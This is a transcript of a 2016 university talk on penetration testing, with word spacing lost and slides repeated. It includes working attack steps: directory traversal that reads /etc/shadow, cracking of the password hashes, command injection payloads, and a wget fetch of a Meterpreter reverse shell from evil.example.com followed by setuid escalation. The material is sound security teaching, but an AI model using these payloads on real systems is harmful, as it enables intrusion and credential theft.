docPenetration Tester - Click Monkey or Creative Hacker
download 
Report Transcription
Penetration Tester - Click Monkey or Creative Hacker
PenetrationTester — ClickMonkeyorCreativeHacker? SebastianChrobak-RedTeamPentestingGmbH [email protected] https://www.redteam-pentesting.de/ SecurityLab2016 ResearchGroupIT-Security-RWTHAachenUniversity 10May2016 Dates&Facts Foundedin2004atRWTHAachen 11penetrationtesters, always3inateam Conductingpenetrationtests worldwide ITSecurityResearch Specialisedexclusivelyonpenetrationtests →Attackinganetworkorproductwiththeowner’s consent Whatisapentest? WaytotestthesecurityofanITsystem Conductingacontrolledattack Offensivetechniquestodiscoverrealvulnerabilities →Slipintotheroleofarealattacker Whatisapentest? WaytotestthesecurityofanITsystem Conductingacontrolledattack Offensivetechniquestodiscoverrealvulnerabilities →Slipintotheroleofarealattacker Whatisapentest? WaytotestthesecurityofanITsystem Conductingacontrolledattack Offensivetechniquestodiscoverrealvulnerabilities →Slipintotheroleofarealattacker Whatcanbetested? Today,nearlyeverything! Whatcanbetested? Today,nearlyeverything! Webapplications,Apps (Internal)companynetworks ...andwhatelse? Homeautomationsystems Technicaldeviceseveryoneknows/has What'suptoday? Howtoapproachobjectivestobetested? Howtoidentifyvulnerabilities? Whichtoolscanbeusedtoexploitthem? Whataretheimpacts? →Basedonreal-worldexamples! RandomsessionIDs RandomsessionIDs RandomsessionIDsofawebsite TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL RandomsessionIDs RandomsessionIDsofawebsite TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL Orjustrandomatfirstglance? TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL Howmuchrandomnessisreallyinthere? Howmuchrandomnessisreallyinthere? Everysecondcharacterisuppercase TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL Howmuchrandomnessisreallyinthere? Everysecondcharacterisuppercase TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL OnlyonecharacterchangedforthreesessionIDs TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL Howmuchrandomnessisreallyinthere? RequestsfromdifferentIPaddresses Howmuchrandomnessisreallyinthere? RequestsfromdifferentIPaddresses From192.168.1.23: TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL Howmuchrandomnessisreallyinthere? RequestsfromdifferentIPaddresses From192.168.1.23: TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL From10.100.1.42: TvWjLdBhGbHvAhJlMgBuPiFkRtJmHOL Reversingtherandomness "Secret"key:dahfbhvagjhk 192.168.1.23=192168001023 dahfbhvagjhk 192168001023 -----------ejjghpvahjjn=eJjGhPvAhJjN Reversingtherandomness "Secret"key:dahfbhvagjhk 192.168.1.23=192168001023 dahfbhvagjhk 192168001023 -----------ejjghpvahjjn=eJjGhPvAhJjN TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL Summary NorandomsessionIDsaregenerated SessionIDsderivablefromIPaddress →Accessapplicationonbehalfofotherusers Summary NorandomsessionIDsaregenerated SessionIDsderivablefromIPaddress →Accessapplicationonbehalfofotherusers Imageretrievalsystem Imageretrievalsystem <imgsrc="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1 hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYm Y0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Imageretrievalsystem <imgsrc="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1 hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYm Y0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Imageretrievalsystem <imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV 8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Imageretrievalsystem <imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV 8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Imageretrievalsystem <imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV 8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> →Imageremainsthesame Wait,what'sthatURLparameterfor? <imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV 8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Wait,what'sthatURLparameterfor? <imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV 8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Maybeitisbase64encoded? Wait,what'sthatURLparameterfor? <imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV 8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]"width="200"/> Maybeitisbase64encoded? $echo-n"bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzY\ xMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0M\ WU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"|base64-d Wait,what'sthatURLparameterfor? master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298 fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Wait,what'sthatURLparameterfor? master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298 fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SHA-256hash,referenceparticularversion Wait,what'sthatURLparameterfor? master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298 fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SHA-256hash,referenceparticularversion Canbereplacedbyadash("-")togetlatestversion Wait,what'sthatURLparameterfor? master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298 fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SHA-256hash,referenceparticularversion Canbereplacedbyadash("-")togetlatestversion master|root|12345|image/jpeg|7415687361172.jpg|- Changingthefilename $echo-n"master|root|12345|text/plain|\ ../../../../../../etc/passwd|-"|base64-w0 bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8u Li8uLi9ldGMvcGFzc3dkfC0= Changingthefilename&accessingarbitraryfiles $curlhttp://www.example.com/medias/redteam?context=bWFzd\ GVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9\ ldGMvcGFzc3dkfC0 Changingthefilename&accessingarbitraryfiles $curlhttp://www.example.com/medias/redteam?context=bWFzd\ GVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9\ ldGMvcGFzc3dkfC0 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [...] Whatabout/etc/shadow? Whatabout/etc/shadow? $curlhttp://www.example.com/medias/redteam?context=bWFzd\ GVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9\ ldGMvc2hhZG93fC0 root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999: [...] seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1:16929:0:9999 itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.:16929:0:99999 CrackingthepasswordswithJohntheRipper $catusers root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/ seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1 itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO. CrackingthepasswordswithJohntheRipper $johnusers [...] Loaded3passwordhasheswith3differentsalts (sha512crypt,crypt(3)$6$[SHA512128/128AVX2x]) seclab(seclab) toor(root) 2g0:00:00:020.45%2/3(ETA:08:17:06)0.7905g/s641.5p/s 642.6c/s642.6C/sbigdog..daisy Trytheharderoneusingapasswordlist $johnusers--wordlist=top50000.pwd [...] Remaining1passwordhash secret123(itsec) 1g0:00:00:23DONE(2016-05-0808:10)0.04237g/s718.6p/s 718.6c/s718.6C/sswitchfoot..clarinet1 Sessioncompleted Summary ContentofURLparametercontextisnotverified Thefileparameterisvulnerabletodirectorytraversal →Retrievearbitraryfilesfromtheserver'sfilesystem Summary ContentofURLparametercontextisnotverified Thefileparameterisvulnerabletodirectorytraversal →Retrievearbitraryfilesfromtheserver'sfilesystem Webserverisstartedasprivilegeduser(/etc/shadow) UsingJohntheRippertocracktheusers'passwords (thepasswordswereweak!) Summary ContentofURLparametercontextisnotverified Thefileparameterisvulnerabletodirectorytraversal →Retrievearbitraryfilesfromtheserver'sfilesystem Webserverisstartedasprivilegeduser(/etc/shadow) UsingJohntheRippertocracktheusers'passwords (thepasswordswereweak!) Real-worldexample? Real-worldexample,really? Real-worldexample? ArbitraryfiledisclosureinSAPhybrisCommerceSoftwareSuitemightdisclosee.g. creditcarddata Moredetails: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016 Backendloginform Administrativebackendloginform Backendloginform Administrativebackendloginform Weakdefaultcredentials admin:admin Backendloginform Administrativebackendloginform Weakdefaultcredentials admin:admin Specialcharacters ;,'"/%( Backendloginform Administrativebackendloginform Weakdefaultcredentials admin:admin Specialcharacters ;,'"/%( →Commandinjection? Verifycommandinjectionvulnerability Showfolderlisting ;ls; Verifycommandinjectionvulnerability Showfolderlisting ;ls; Printsysteminformation ;uname-a; Whathappensinthebackground? Whathappensinthebackground? <?php $login_res=shell_exec( 'bashcheck_password.sh'.$_POST['user'].''.$_POST['pass'] ); ?> Whathappensinthebackground? <?php $login_res=shell_exec( 'bashcheck_password.sh'.$_POST['user'].''.$_POST['pass'] ); ?> $login_res=shell_exec( 'bashcheck_password.shadmin;ls;password' ); Therearesomeconstraints... Incomingconnectionsonlyacceptedonport80 Port80alreadyblockedbythewebserver Don'treinventthewheel Don'treinventthewheel CreateaconnectbackshellusingMetasploitFramework $msfvenom-plinux/x86/meterpreter/reverse_tcp\ LHOST=6.6.6.6-felf-ometerpreter Noplatformwasselected,choosingMsf::Module::Platform::Linuxfromthepayload NoArchselected,selectingArch:x86fromthepayload Noencoderorbadcharsspecified,outputtingrawpayload Payloadsize:71bytes Savedas:meterpreter UsingMetasploitFramework Startingmsfconsoleonattackerhost $./msfconsole msf>useexploit/multi/handler msfexploit(handler)>setpayloadlinux/x86/meterpreter/reverse_tcp [...] msfexploit(handler)>exploit [*]StartedreverseTCPhandleron0.0.0.0:4444 [*]Startingthepayloadhandler... UsingMetasploitFramework Usethecommandinjectionvulnerability: wgethttp://evil.example.com\ /meterpreter chmod+xmeterpreter ./meterpreter UsingMetasploitFramework [*]Transmittingintermediatestagerforover-sizedstage... [*]Meterpretersession1opened(6.6.6.6:4444->8.8.8.8:58508) at2016-05-0810:30:53-0400 meterpreter>shell Process6664created. Channel1created. $id uid=33(www-data)gid=33(www-data)groups=33(www-data) Howtoexpandprivileges? Lookforexecutableswithsetuidbit ("setuserIDuponexecution") →Runexecutablewithpermissionsoffile'sowner Howtoexpandprivileges? Lookforexecutableswithsetuidbit ("setuserIDuponexecution") →Runexecutablewithpermissionsoffile'sowner $find.-userroot-perm-4000-execls-al{}\; -rwsr-xr-x1rootroot8008May810:48/usr/local/check_update Howtoexpandprivileges? Lookforexecutableswithsetuidbit ("setuserIDuponexecution") →Runexecutablewithpermissionsoffile'sowner $find.-userroot-perm-4000-execls-al{}\; -rwsr-xr-x1rootroot8008May810:48/usr/local/check_update Sadly,it'snotworld-writable AnalysingexecutablesusingIDAmulti-processordisassembler Finally:rootaccess $PROG=id/usr/local/check_update Willexecuteid. uid=1000(seclab)gid=1001(seclab)euid=0(root)groups=1001(seclab) Summary User-providedinputisnotescaped Dangeroussetuidexecutablefound →Commandexecutionwithrootprivileges →Fullcompromiseofthesystem Endangersallconnected(internal)systems Summary User-providedinputisnotescaped Dangeroussetuidexecutablefound →Commandexecutionwithrootprivileges →Fullcompromiseofthesystem Endangersallconnected(internal)systems Whataretheusualsuspects? Defaultpasswords admin:admin,root:root Broken(management)webapps(WiFirouter, switches,CIserver) Outdatedsoftware (e.g.win2000) FilesonSMBsharesaccessible: "passwordlist2016.xlsx" "passwordforpasswordlist.txt" Missing/Brokenauthorisation Certificateverificationfailures curl_opt_VERIFY_CERT=0 Homebrewtrustmanagers Moreexamplesonourwebsite o2/TelefonicaGermany: ACSDisclosesVoIP/SIPCredentials AVMFRITZ!Box: RemoteCodeExecutionviaBufferOverflow UnauthenticatedRemoteCodeExecutioninIBMEndpointManagerMobileDevice ManagementComponents EntryPassN5200CredentialsDisclosure https://www.redteam-pentesting.de/advisories/ Whatdoesapentester'sdaylooklike? Whatdoesapentester'sdaylooklike? Regularusageofthesoftware: Understandtheapplication'sfunctionalityandbehaviour →Basisforanyfurtherexploitation Provokeerrors,watchforanomalies Whatdoesapentester'sdaylooklike? Regularusageofthesoftware: Understandtheapplication'sfunctionalityandbehaviour →Basisforanyfurtherexploitation Provokeerrors,watchforanomalies Uncoverwhat'shappeninginthebackground: Analysethecommunication,understandhowservicesplaytogether Whatdoesapentester'sdaylooklike? Identifyweaknessesandexploitvulnerabilities Manipulateparameters Insertunexpectedvalues Changeperspectives Becreative,usefunctionsdifferently! Whatdoesapentester'sdaylooklike? Identifyweaknessesandexploitvulnerabilities Manipulateparameters Insertunexpectedvalues Changeperspectives Becreative,usefunctionsdifferently! Documentation About30%ofthetimeofapentest Whatdoesapentester'sdaylooklike? Identifyweaknessesandexploitvulnerabilities Manipulateparameters Insertunexpectedvalues Changeperspectives Becreative,usefunctionsdifferently! Documentation About30%ofthetimeofapentest FinalMeeting Discussionofvulnerabilities Livedemo Butwait,aren'ttheretoolstodothis? Butwait,aren'ttheretoolstodothis? Toolscannotfindnon-obviousvulnerabilities Especiallynottheinterestingones! Pentestingishandwork! Buttoolseasetheexploitation Knowyourtoolboxandpicktherightone! Thisistheend. Thankyouforlistening! Anyquestions? Thisistheend. Thankyouforlistening! Anyquestions? Next:Opendiscussionround!
